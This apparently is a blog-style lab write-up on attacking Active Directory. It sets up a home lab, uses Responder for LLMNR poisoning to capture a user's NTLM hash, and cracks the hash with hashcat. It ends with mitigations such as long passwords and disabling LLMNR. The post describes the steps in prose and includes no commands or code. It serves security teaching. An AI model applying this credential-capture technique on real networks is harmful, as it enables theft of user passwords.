Building Active Directory Hacking.
Step 1:Overview
Active Directory (AD) remains a cornerstone of IT infrastructure for organizations worldwide, but it also continues to be a prime target for cyberattacks.
Why Active Directory?
Attackers target Active Directory because of its critical role in managing user access and permissions across enterprise networks. A compromised AD environment can provide attackers with the keys to the kingdom, enabling lateral movement, privilege escalation, and data exfiltration.
In the coming articles, we will be showing practical exercises on common attacks and some mitigation strategies. So without wasting any time, let us dive in and do the work.
Disclaimer: This is only for educational purposes. DO NOT try this on production environments or networks that you don’t have permission to access.
Step 2:Lab Environment Setup
The labs contain the following setup:
- A Windows Server with a Domain Controller (DC).
- Two Windows 11 clients joined the domain, with shared folders enabled.
- A hacker laptop running Kali Linux.
In this environment:
- Active Directory was installed and configured.
- Users, groups, and SQL service were created to demonstrate attack.
- SMB shared folders were configured.
- Group Policy was applied to restrict Windows Defender Antivirus.
This setup provides a simple realistic environment for simulating attacks and testing mitigation strategies- the goal is to find the weakness and implement security controls.
Step 3: Initial attack: LLMNR
Under this step, There are 4 sequence steps that happen.
- Responder set up
- Generate event-like the user trying to access shared resources
- Get username, IP and NTLMhash
- Crack the NTLMhash and find the password.
What is LLMNR Poisoning?
LLMNR stands for Link-Local Multicast Name Resolution. It is a protocol used on Windows networks to resolve hostnames to IP addresses when DNS fails or is unavailable.
In an LLMNR Poisoning attack, an attacker sets up a rogue responder tool on the network to intercept LLMNR requests. When a client broadcasts a request asking for the IP address of a specific hostname, the attacker’s rogue machine responds with its IP, tricking the victim into communicating with the malicious system.
In this case, the attacker enabled the Responder tool to intercept LLMNR requests. I will demonstrate this in my upcoming demo.
One of the first attacks in our lab involves targeting server features using a technique called LLMNR Poisoning.
In order for this attack to work, you will need to install the responder tool on the Kali machine, which I did, and start generating events so that the responder captures the traffic.
- Set up the Responder
2.Generate the Event- For this demo,let us say that a user tried to access shared resources, unfortunately user access was unable to access the resources but the attacker intercepted the traffic and obtained the username, NTLMhashes which contains the user password.
NTLM (New Technology LAN Manager) hashes are secure representations of user passwords, commonly used for authentication in Windows environments. They play a crucial role in validating user identities without exposing plaintext credentials as you will see in step 3.
3. Get NTLMhash.
We can see that the responder got user information like IP address, username and more importantly NTLMhash. This is not a good situation.
4. NTLMhash Crack.
So now let us try to extract the password from the NTLMhash. For me, I used hashcat for password cracking.
After the process of cracking hashes, we can see the password is not complex nor long enough, this is a huge security risk in organization environments.
Step 4:Mitigation strategies and Problem solved:
One of the most effective defenses is implementing strong password policies, requiring a minimum of 15 characters, a mix of complexity, and restrictions on the use of common or easily guessable words also disable LLMNR.
This is part of my ongoing Active Directory Security Project. Stay tuned for the next project!